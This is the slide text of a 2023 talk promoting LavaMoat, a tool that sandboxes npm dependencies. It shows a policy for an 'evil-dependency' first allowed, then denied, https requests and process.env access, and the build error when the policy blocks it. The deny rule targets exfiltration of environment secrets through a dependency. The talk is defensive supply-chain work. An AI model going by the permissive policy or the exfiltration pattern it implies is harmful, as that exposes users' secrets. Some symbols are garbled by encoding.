I run code from the Internet!


🌩️

@naugtur, 2023
npm logo gobble
Hello, we've found a malicious package version in your dependencies that…
you've been shipping to production for a week.

- npm audit

This new package looks odd. Got time to read it?

- socket.dev

πŸͺ„


How does it work?



Demo:
https://github.com/naugtur/i-run-code-from-the-internet
## Let's install ## that build tool
#### yo, there's an app for that! ``` package.json: "scripts": { "generate-policy": "lavamoat build.js --auto", "build": "lavamoat build.js", ``` --- #### the policy ```js ./lavamoat/node/policy.json: "that-eslint-plugin>evil-dependency": { "builtin": { "https.request": true }, "globals": { "process.env": true }, ``` --- #### the policy ```js ./lavamoat/node/policy.json: "that-eslint-plugin>evil-dependency": { "builtin": { "https": false }, "globals": { "process": false }, ``` --- ``` $ npm run build Error: LavaMoat - required node builtin package not in allowlist: package "evil-dependency" requested "https" TypeError: Cannot read properties of undefined (reading 'env') ```
# (β•―Β°β–‘Β°)β•―οΈ΅ ┻━┻   # how ?!
### There's also a bundler 1. browserify based 2. webpack plugin (in BETA) Wanna help with the plugin? #### Open Beta hub here: [https://github.com/LavaMoat/LavaMoat/discussions/723](https://github.com/LavaMoat/LavaMoat/discussions/723)
### Want to know more? [Earlier talk with more SES details](https://www.youtube.com/watch?v=Qjeh7Qo2u28) [Mark Miller on F5 Tech Talks](https://www.youtube.com/watch?v=u-XETUbxNUU)
### But I promised I'll ![eval](./ilus/meme.jpg)

I'll help you set up LavaMoat in your project

@naugtur   naugtur.pl

naugtur.pl/training